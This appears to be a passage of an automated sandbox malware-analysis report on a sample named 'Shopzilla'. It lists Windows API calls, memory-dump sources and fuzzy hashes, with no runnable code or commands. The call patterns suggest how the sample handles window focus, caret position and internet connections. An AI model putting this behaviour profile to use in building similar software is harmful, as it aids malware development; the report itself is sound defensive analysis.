                                              • Opcode Fuzzy Hash: 0c6c1b9ccaae6e7e9e84a3b9db10d220f948baad789d4eb54e28ef2f4aae0a2a
                                              • Instruction Fuzzy Hash: 2C319031600256AFDB258F69C884BAEBBF5FF41320F1541AAF86487291F731E850DB94
                                              APIs
                                              • GetForegroundWindow.USER32 ref: 00C25307
                                                • Part of subcall function 00C039A1: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00C039BB
                                                • Part of subcall function 00C039A1: GetCurrentThreadId.KERNEL32 ref: 00C039C2
                                                • Part of subcall function 00C039A1: AttachThreadInput.USER32(00000000,?,00C0542D), ref: 00C039C9
                                              • GetCaretPos.USER32(?), ref: 00C25318
                                              • ClientToScreen.USER32(00000000,?), ref: 00C25353
                                              • GetForegroundWindow.USER32 ref: 00C25359
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                              • String ID:
                                              • API String ID: 2759813231-0
                                              • Opcode ID: 785afad68a4f71048dea5f4f7db0704bc0daab6bf796540b628d07c184634688
                                              • Instruction ID: 22cc842e166c291b657d438456dff1cbadcc94e2cfc1522ea5050e534c26d7e3
                                              • Opcode Fuzzy Hash: 785afad68a4f71048dea5f4f7db0704bc0daab6bf796540b628d07c184634688
                                              • Instruction Fuzzy Hash: 58312E72900108AFDB10EFA5D885AEFB7F9EF95304F1044AAE415E7241DBB1AE458BA1
                                              APIs
                                                • Part of subcall function 00BA29E2: GetWindowLongW.USER32(?,000000EB), ref: 00BA29F3
                                              • GetCursorPos.USER32(?), ref: 00C2C8F5
                                              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00BDBC1C,?,?,?,?,?), ref: 00C2C90A
                                              • GetCursorPos.USER32(?), ref: 00C2C957
                                              • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00BDBC1C,?,?,?), ref: 00C2C991
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: Cursor$LongMenuPopupProcTrackWindow
                                              • String ID:
                                              • API String ID: 2864067406-0
                                              • Opcode ID: 017abea5f972734a19ca7772b5a04497beaa1137e96eacb2541101127e3579de
                                              • Instruction ID: 44a69d1ea4eee21d8df5d472ae568d1de5d28b9d337dc59b301c0728bb1d5b76
                                              • Opcode Fuzzy Hash: 017abea5f972734a19ca7772b5a04497beaa1137e96eacb2541101127e3579de
                                              • Instruction Fuzzy Hash: 9731D235600128AFCB25DF59E894FEE7BB9EB4E310F044169F91587661C7315EA0DFA0
                                              APIs
                                              • __setmode.LIBCMT ref: 00BC0B0D
                                                • Part of subcall function 00BB402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00C07CBE,?,?,00000000), ref: 00BB4041
                                                • Part of subcall function 00BB402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00C07CBE,?,?,00000000,?,?), ref: 00BB4065
                                              • _fprintf.LIBCMT ref: 00BC0B44
                                              • OutputDebugStringW.KERNEL32(?), ref: 00BF672F
                                                • Part of subcall function 00BC4BFA: _flsall.LIBCMT ref: 00BC4C13
                                              • __setmode.LIBCMT ref: 00BC0B79
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                              • String ID:
                                              • API String ID: 521402451-0
                                              • Opcode ID: 6f62fad722af3409ab858319279be3c111240c295024bc5b02ad884e3ddd213b
                                              • Instruction ID: 15394035a62578d82684a3cac6cac778c50fc7947fc489f0b2c85cc4275e4d62
                                              • Opcode Fuzzy Hash: 6f62fad722af3409ab858319279be3c111240c295024bc5b02ad884e3ddd213b
                                              • Instruction Fuzzy Hash: 3B110232904204ABDA14B7A8AC52FBE7BE8EF41320F1441EDF204971C2DFB05D4697A4
                                              APIs
                                                • Part of subcall function 00BF8B0B: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00BF8B22
                                                • Part of subcall function 00BF8B0B: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00BF8B2C
                                                • Part of subcall function 00BF8B0B: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00BF8B3B
                                                • Part of subcall function 00BF8B0B: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00BF8B42
                                                • Part of subcall function 00BF8B0B: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00BF8B58
                                              • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00BF90A4
                                              • _memcmp.LIBCMT ref: 00BF90C7
                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00BF90FD
                                              • HeapFree.KERNEL32(00000000), ref: 00BF9104
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                              • String ID:
                                              • API String ID: 1592001646-0
                                              • Opcode ID: fbecf680a833e58fdfd4ea75b7b7b2c7b846ac410baad1fc813a1e98035990fa
                                              • Instruction ID: 2f9f63c6e3ffe2d8cd5ddd4c0cb93f9f1300653d0c9d4422317d82cb2258009d
                                              • Opcode Fuzzy Hash: fbecf680a833e58fdfd4ea75b7b7b2c7b846ac410baad1fc813a1e98035990fa
                                              • Instruction Fuzzy Hash: B8216D72E4010DAFDB10DFA9C985BFEB7F8EF44315F144099E955A7241EB32AA09CB50
                                              APIs
                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00C11C53
                                                • Part of subcall function 00C11CDD: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00C11CFC
                                                • Part of subcall function 00C11CDD: InternetCloseHandle.WININET(00000000), ref: 00C11D99
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: Internet$CloseConnectHandleOpen
                                              • String ID:
                                              • API String ID: 1463438336-0
                                              • Opcode ID: 0bf60ff6200b6d0ab357888686e4ae1cdd925a5ed1e70899fb4543334c121c08
                                              • Instruction ID: 489af470b304c3ccd1927be31908eef4f48dde496f59ea2e1680cb04d0a1a660
                                              • Opcode Fuzzy Hash: 0bf60ff6200b6d0ab357888686e4ae1cdd925a5ed1e70899fb4543334c121c08
                                              • Instruction Fuzzy Hash: 2421FF36280600BFDB118F618C11FFBB7A9FF86700F18401AFA5196650DB75A961BBE0
                                              APIs
                                              • GetWindowLongW.USER32(?,000000EC), ref: 00C26185
                                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00C2619F
                                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00C261AD
                                              • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00C261BB
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: Window$Long$AttributesLayered
                                              • String ID:
                                              • API String ID: 2169480361-0
                                              • Opcode ID: a5e1712764d2f8a0a626124421bd23b0b7dc7a05c77ca2603c96d3f0fa3e0513
                                              • Instruction ID: f4787bdc92f502045386208740764fe3f3bf79883ab89191b0f7cc3053ad97a3
                                              • Opcode Fuzzy Hash: a5e1712764d2f8a0a626124421bd23b0b7dc7a05c77ca2603c96d3f0fa3e0513
                                              • Instruction Fuzzy Hash: 1E11EE36304524AFDB15AB14DC15FBE77A8AF86320F184118F926CB2D2CB60AE00CBA4
                                              APIs
                                                • Part of subcall function 00BFF63B: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00BFE252,?,?,?,00BFF045,00000000,000000EF,00000119,?,?), ref: 00BFF64A
                                                • Part of subcall function 00BFF63B: lstrcpyW.KERNEL32(00000000,?), ref: 00BFF670
                                                • Part of subcall function 00BFF63B: lstrcmpiW.KERNEL32(00000000,?,00BFE252,?,?,?,00BFF045,00000000,000000EF,00000119,?,?), ref: 00BFF6A1
                                              • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00BFF045,00000000,000000EF,00000119,?,?,00000000), ref: 00BFE26B
                                              • lstrcpyW.KERNEL32(00000000,?), ref: 00BFE291
                                              • lstrcmpiW.KERNEL32(00000002,cdecl,?,00BFF045,00000000,000000EF,00000119,?,?,00000000), ref: 00BFE2C5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: lstrcmpilstrcpylstrlen
                                              • String ID: cdecl
                                              • API String ID: 4031866154-3896280584
                                              • Opcode ID: c4405e8f52a24a49635c7b628782a41db8c13772440f966f01fc2b871f371e82
                                              • Instruction ID: d6c6b4bbf5d9b257713427acb98d4a8737feef9de2613d8902fb96fa57ce5769
                                              • Opcode Fuzzy Hash: c4405e8f52a24a49635c7b628782a41db8c13772440f966f01fc2b871f371e82
                                              • Instruction Fuzzy Hash: 1B11BE36200309AFDB25AF24D845E7A77E9FF45310B40416AF906CB2B0EB71D855C7A0
                                              APIs
                                              • _free.LIBCMT ref: 00BD5261
                                                • Part of subcall function 00BC586C: __FF_MSGBANNER.LIBCMT ref: 00BC5883
                                                • Part of subcall function 00BC586C: __NMSG_WRITE.LIBCMT ref: 00BC588A
                                                • Part of subcall function 00BC586C: RtlAllocateHeap.NTDLL(00D20000,00000000,00000001,?,00000004,?,?,00BC0F33,?), ref: 00BC58AF
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: AllocateHeap_free
                                              • String ID:
                                              • API String ID: 614378929-0
                                              • Opcode ID: b0f88b6bf52049d1e2c041deb0a152dfb3843a1f0d8143ba07d7c284e46063d8
                                              • Instruction ID: 9256d4599e4e1b531835ef3e762359580a9c3bf2960f36b39ebeaafa3147803d
                                              • Opcode Fuzzy Hash: b0f88b6bf52049d1e2c041deb0a152dfb3843a1f0d8143ba07d7c284e46063d8
                                              • Instruction Fuzzy Hash: B511C632906A25ABCB303F70AC45B5F7BD8DF21360F2445EFF9599A250EE30894487E4
                                              APIs
                                              • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00C041F2
                                              • _memset.LIBCMT ref: 00C04213
                                              • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00C04265
                                              • CloseHandle.KERNEL32(00000000), ref: 00C0426E
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: CloseControlCreateDeviceFileHandle_memset
                                              • String ID:
                                              • API String ID: 1157408455-0
                                              • Opcode ID: 2f4e5624bd6eabadfb53ef01cfaeb068175f63dbb3b456aef43686329c3a2289
                                              • Instruction ID: f77af52090dde1d0e7b934e7dbe745630183ae0b6aed23aa5e495822b2198374
                                              • Opcode Fuzzy Hash: 2f4e5624bd6eabadfb53ef01cfaeb068175f63dbb3b456aef43686329c3a2289
                                              • Instruction Fuzzy Hash: E71158769012287AD73097A59C4DFAFBB7CEB45760F10419AF918A7190D6744E80CBA4
                                              APIs
                                                • Part of subcall function 00BB402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00C07CBE,?,?,00000000), ref: 00BB4041
                                                • Part of subcall function 00BB402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00C07CBE,?,?,00000000,?,?), ref: 00BB4065
                                              • gethostbyname.WSOCK32(?,?,?), ref: 00C16849
                                              • WSAGetLastError.WSOCK32(00000000), ref: 00C16854
                                              • _memmove.LIBCMT ref: 00C16881
                                              • inet_ntoa.WSOCK32(?), ref: 00C1688C
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                              • String ID:
                                              • API String ID: 1504782959-0
                                              • Opcode ID: f98ef4c630bc65ef3ffe6c219c132d0d800504206c7b9ec8ee048cdd72daa069
                                              • Instruction ID: 569281a95eda32b5ff7d35f9102839258a9c2afbdf893778a04a40f659d768eb
                                              • Opcode Fuzzy Hash: f98ef4c630bc65ef3ffe6c219c132d0d800504206c7b9ec8ee048cdd72daa069
                                              • Instruction Fuzzy Hash: E2118172500108AFCB04FBA4C956DEEB7F8EF05310B5440A5F501A72A2DF71AE44EB91
                                              APIs
                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 00BF94FC
                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00BF950E
                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00BF9524
                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00BF953F
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: MessageSend
                                              • String ID:
                                              • API String ID: 3850602802-0
                                              • Opcode ID: 54fd15227876ad19dbe79b420a824bccac9f3a862a7790d719bdabc5e38898c2
                                              • Instruction ID: 9b94b3b308b0541058b7ccd6532c221ecbe9ec95aec3cfa70fac20d2c9512cab
                                              • Opcode Fuzzy Hash: 54fd15227876ad19dbe79b420a824bccac9f3a862a7790d719bdabc5e38898c2
                                              • Instruction Fuzzy Hash: 3F115A3A900218FFEB11DF99CC85FADBBB8FB48310F204095EA00B7290D671AE14DB90
                                              APIs
                                                • Part of subcall function 00BA29E2: GetWindowLongW.USER32(?,000000EB), ref: 00BA29F3
                                              • DefDlgProcW.USER32(?,00000020,?), ref: 00BA16B4
                                              • GetClientRect.USER32(?,?), ref: 00BDB86C
                                              • GetCursorPos.USER32(?), ref: 00BDB876
                                              • ScreenToClient.USER32(?,?), ref: 00BDB881
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: Client$CursorLongProcRectScreenWindow
                                              • String ID:
                                              • API String ID: 4127811313-0
                                              • Opcode ID: 15c0bdfddd1306e36d47de677448178b3216deab7b3388cd81a3e91bfe7f04af
                                              • Instruction ID: e5e300e5a8783eccbdba36a3211502a708d37e0a3cd21b975b8a8140d02ec8c7
                                              • Opcode Fuzzy Hash: 15c0bdfddd1306e36d47de677448178b3216deab7b3388cd81a3e91bfe7f04af
                                              • Instruction Fuzzy Hash: 49111376A04119ABCB10EFACD896ABE77B8FB06301F540895F901E7150C730AA518BA5
                                              APIs
                                              • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00BA214F
                                              • GetStockObject.GDI32(00000011), ref: 00BA2163
                                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 00BA216D
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: CreateMessageObjectSendStockWindow
                                              • String ID:
                                              • API String ID: 3970641297-0
                                              • Opcode ID: 28a1e77601517153e968dbc285105cc756f6e13019fafce88778d7fb9cdbbb18
                                              • Instruction ID: a7d74fb5d6105be430e55ba65ce52c7cad3d78f9f1482115109d344141f937d7
                                              • Opcode Fuzzy Hash: 28a1e77601517153e968dbc285105cc756f6e13019fafce88778d7fb9cdbbb18
                                              • Instruction Fuzzy Hash: 62118B72505509BFDB124FA4DC91FEABBA9EF5A354F140152FB0462110C7319C60AFA0
                                              APIs
                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00C00358,?,00C013AB,?,00008000), ref: 00C017CA
                                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00C00358,?,00C013AB,?,00008000), ref: 00C017EF
                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00C00358,?,00C013AB,?,00008000), ref: 00C017F9
                                              • Sleep.KERNEL32(?,?,?,?,?,?,?,00C00358,?,00C013AB,?,00008000), ref: 00C0182C
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: CounterPerformanceQuerySleep
                                              • String ID:
                                              • API String ID: 2875609808-0
                                              • Opcode ID: 3d98406e7a547b4a2ae35701a67597b0900dd9c214bd0374e1b9ac745b2d4fea
                                              • Instruction ID: 25c0c0658282871d52af72e113ce819c880d46369ef1a8ef929cd5549088bf6c
                                              • Opcode Fuzzy Hash: 3d98406e7a547b4a2ae35701a67597b0900dd9c214bd0374e1b9ac745b2d4fea
                                              • Instruction Fuzzy Hash: F1112A31D01618DBCF00AFA5D989BEEFBB8FF08711F598159ED41B2180CB3056A0CB91
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                              • String ID:
                                              • API String ID: 3016257755-0
                                              • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                              • Instruction ID: 937149d1e2a288195daac494cfcf42363dc1b5c8b5191c16d5f9a51ae382fb06
                                              • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                              • Instruction Fuzzy Hash: 0901723208414ABBCF125E84CC458EE7FA6BB18340B548596FA1864230EB36C971AB81
                                              APIs
                                              • GetWindowRect.USER32(?,?), ref: 00C2B6D1
                                              • ScreenToClient.USER32(?,?), ref: 00C2B6E9
                                              • ScreenToClient.USER32(?,?), ref: 00C2B70D
                                              • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00C2B728
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
